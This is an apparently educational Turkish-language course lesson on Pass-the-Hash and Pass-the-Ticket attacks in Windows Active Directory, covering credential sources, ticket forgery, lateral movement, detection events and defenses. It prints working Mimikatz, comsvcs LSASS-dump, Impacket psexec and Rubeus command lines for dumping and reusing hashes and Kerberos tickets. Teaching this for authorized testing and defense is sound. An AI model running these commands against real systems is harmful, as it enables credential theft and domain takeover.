Cyber Security Academy · Ders

Pass-the-Hash ve Pass-the-Ticket

Çalınan kimlik bilgilerini yeniden kullanma.

3. ders / 413 adım

Pass-the-Hash ve Pass-the-Ticket, CoddyKit'te ücretsiz bir Cyber Security Academy dersidir. Bu, 4 dersinin 3. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Cyber Security Academy öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Cyber Security Academy kursu toplamda 4 dersten oluşur.

Parolasız Kimlik Bilgileri

Windows kimlik doğrulaması çoğu zaman kullanım noktasında düz metin parola gerektirmez. NTLM özet değerleri ve Kerberos biletleri kendi başlarına kimlik doğrulaması yapabilir. Saldırganlar bundan yararlanır: öğeyi çalar ve yeniden kullanırlar.

  • Özet Değerle Geçiş (PtH) bir NTLM özet değerini yeniden kullanır.
  • Biletle Geçiş (PtT) bir Kerberos biletini yeniden kullanır.
  • Her ikisi de parolanın kırılmasını gerektirmez.

Kimlik Bilgileri Nerede Bulunur

Kimlik bilgisi materyali normal çalışma sırasında bellekte ve diskte önbelleğe alınır. Yaygın kaynaklar şunlardır:

  • LSASS işlem belleği, oturum açmış kullanıcıların özet değerlerini ve biletlerini tutar.
  • SAM veritabanı yerel hesapların özet değerlerini saklar.
  • NTDS.dit, DC'lerde tüm etki alanı özet değerlerini saklar.
  • DPAPI ile korunan kimlik bilgisi kasaları ve tarayıcı depoları.

LSASS dökümü almak, en yaygın kimlik bilgisi toplama adımıdır.

# Mimikatz: dump logon passwords and hashes
privilege::debug
sekurlsa::logonpasswords

# Comsvcs minidump of lsass (living-off-the-land)
rundll32 C:\windows\system32\comsvcs.dll, MiniDump <pid> lsass.dmp full

Özet Değerle Geçiş Mekanizması

NTLM kimlik doğrulaması, bir sorgulama-yanıt sürecinde parolanın gizli değeri olarak onun özet değerini kullanarak parolayı bildiğinizi kanıtlar. Özet değere sahipseniz, parolayı hiçbir zaman bilmeden el sıkışmayı tamamlayabilirsiniz.

Bu nedenle NT özet değeri parolaya denktir. NTLM kabul eden her hizmete yalnızca özet değerle erişilebilir.

# Mimikatz pass-the-hash spawns a process with injected creds
sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:<NThash> /run:cmd.exe

# Impacket psexec via hash
psexec.py -hashes :<NThash> corp.local/Administrator@10.0.0.20

Biletle Geçiş Mekanizması

Kerberos biletleri taşıyıcı belirteçlerdir: geçerli bir TGT veya TGS'yi elinde tutan herkes, süresi dolana kadar onu kullanabilir. Saldırganlar biletleri LSASS'den çıkarır ve kendi oturumlarına enjekte eder.

  • Bir TGT'yi çalmak, o kullanıcı olarak hizmet biletleri istemenizi sağlar.
  • Bir TGS'yi çalmak, tek bir belirli hizmete erişim sağlar.
# Export all tickets, then inject one
Rubeus.exe dump /nowrap
Rubeus.exe ptt /ticket:doIF... (base64 blob)

# Mimikatz
sekurlsa::tickets /export
kerberos::ptt ticket.kirbi

Özet Değer Üzerinden Geçiş

Özet Değer Üzerinden Geçiş (anahtar üzerinden geçiş olarak da bilinir), NTLM ile Kerberos arasında köprü kurar. Çalınmış bir NTLM (veya AES) anahtarını kullanarak geçerli bir Kerberos TGT'si ister, ardından tamamen Kerberos içinde çalışırsınız.

Bu yöntem doğrudan PtH'den daha gizlidir; çünkü ortaya çıkan trafik normal Kerberos kimlik doğrulaması gibi görünür.

# Rubeus: turn an NTLM hash into a TGT
Rubeus.exe asktgt /user:svc_sql /rc4:<NThash> /ptt

# AES key is even quieter than RC4
Rubeus.exe asktgt /user:svc_sql /aes256:<key> /ptt

Altın ve Gümüş Biletler

Daha derin erişim elde edildiğinde saldırganlar biletleri doğrudan sahteleyebilir.

  • Bir Altın Bilet, krbtgt özet değeriyle imzalanmış sahte bir TGT'dir. Herhangi bir kimliğe yetki verir ve krbtgt iki kez döndürülene kadar geçerlidir.
  • Bir Gümüş Bilet, tek bir hizmet için oluşturulmuş ve o hizmet hesabının özet değeriyle imzalanmış sahte bir TGS'dir. DC'ye hiç ulaşmadığı için sessiz kalır.
  • Bir Elmas Bilet, bilet sahteciliği tespitlerinden kaçmak için meşru biçimde verilmiş bir TGT'yi değiştirir.

Yanal Hareket Kalıpları

Yeniden kullanılan kimlik bilgileri yanal hareketi mümkün kılar. Yaygın çalıştırma kanalları şunlardır:

  • SMB + hizmet oluşturma (psexec tarzı).
  • WMI ile uzaktan işlem oluşturma.
  • WinRM / PowerShell ile uzaktan yönetim.
  • DCOM ile nesne örnekleme.

Aynı çalınmış özet değer veya bilet, hesabın yerel yönetici olduğu birçok ana bilgisayarın kilidini açabilir.

Yerel Yönetici Bilgilerinin Yeniden Kullanılması Neden Zararlı

Makineler arasında paylaşılan tek bir yerel yönetici parolası felakettir. Bu parolanın dökümünü bir kez alırsanız, onu paylaşan her ana bilgisayara PtH ile geçebilirsiniz.

LAPS, her makine için benzersiz ve düzenli olarak değiştirilen bir yerel yönetici parolası belirleyip bunu sınırlı okuma erişimiyle AD'de saklayarak bu sorunu çözer.

Tespit

Bu saldırıları izlerseniz geride telemetri bırakırlar.

  • Kerberos'un beklendiği yerlerde NTLM kullanılan 3 / 9 oturum açma türleri.
  • seclogon içeren veya ayrıcalıklı hesaplardan gelen olağandışı NTLM içeren 4624 olayı.
  • Bilet anormallikleri: öncesinde TGT bulunmayan TGS (Gümüş Bilet) veya olağandışı ömürlere sahip biletler (Altın Bilet).
  • Standart dışı işlemlerden LSASS'a erişim (Sysmon olayı 10).

Savunmalar

Sağlamlaştırma, kimlik bilgilerini korumaya ve yalıtmaya odaklanır.

  • Kimlik Bilgisi Koruması'nı etkinleştirerek LSASS sırlarını bir VBS yalıtılmış alanında yalıtın.
  • Hassas hesapları Korumalı Kullanıcılar'a ekleyin (NTLM yok, delegasyon yok, kısa bilet ömrü).
  • LAPS'ı dağıtın ve Katman 0 kimlik bilgilerinin iş istasyonlarına hiç ulaşmaması için yönetici katmanlandırmasını zorunlu kılın.
  • Şüpheli Altın Bilet ihlalinde krbtgt'yi iki kez döndürün.

Sorumlu Değerlendirme

LSASS dökümü almak ve bilet sahtelemek yüksek etkili işlemlerdir. Bunları yalnızca açık yetkilendirmeyle ve üzerinde anlaşılmış hedeflerde gerçekleştirin. Kapsamda değilse üretim DC'lerinin dökümünü almaktan kaçının ve raporlamadan sonra toplanan özet değerleri ile biletleri güvenli biçimde yok edin.

Her kimlik bilgisi yeniden kullanımını belgeleyin; böylece savunma ekipleri tespitlerinin çalıştığını doğrulayabilir.

Hızlı Kontrol

Kimlik bilgisi yeniden kullanma saldırılarını ne ölçüde anladığınızı kontrol edin.

Özet

Çalınmış özet değerlerin ve biletlerin parolaları tamamen nasıl atlattığını gördünüz.

  • PtH, NTLM özet değerlerini; PtT, Kerberos biletlerini yeniden kullanır.
  • Özet Değer Üzerinden Geçiş, bir özet değeri temiz bir Kerberos TGT'sine dönüştürür.
  • Altın, Gümüş ve Elmas biletler kalıcılık için sahte olarak oluşturulur.
  • Kimlik Bilgisi Koruması, LAPS, Korumalı Kullanıcılar ve krbtgt döndürme temel savunmalardır.

Sırada: ilk tutunma noktasını tam etki alanı hakimiyetine dönüştürmek var.

Başlamak ücretsiz

Yapay zeka eğitmeniyle Cyber Security Academy öğren — ücretsiz

Tarayıcında gerçek kod yaz ve çalıştır, 7/24 yapay zeka eğitmeninden anında yardım al; web'de ya da uygulamada kaldığın yerden devam et.

Kurslar
76
Dersler
303

Sıkça Sorulan Sorular

“Pass-the-Hash ve Pass-the-Ticket” dersi ücretsiz mi?

Evet — “Pass-the-Hash ve Pass-the-Ticket” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Cyber Security Academy kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Cyber Security Academy kursu toplamda 4 dersten oluşur.

“Pass-the-Hash ve Pass-the-Ticket” dersinde ne öğreneceğim?

Çalınan kimlik bilgilerini yeniden kullanma. Cyber Security Academy ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.

Cyber Security Academy öğrenmeye başlamak için deneyim gerekli mi?

Önceden deneyim gerekmez. CoddyKit'te Cyber Security Academy, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 3. dersidir.

“Pass-the-Hash ve Pass-the-Ticket” dersi ne kadar sürer?

Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.

Bu Cyber Security Academy dersinde kod yazıp çalıştırabilir miyim?

Evet. Her Cyber Security Academy dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.

Bu kursun tüm dersleri

  1. Active Directory Saldırı Yüzeyi
  2. Kerberos ve Kerberoasting
  3. Pass-the-Hash ve Pass-the-Ticket
  4. Ayrıcalık Yükseltme ve Etki Alanı Hâkimiyeti
← Cyber Security Academy Sayfasına Dön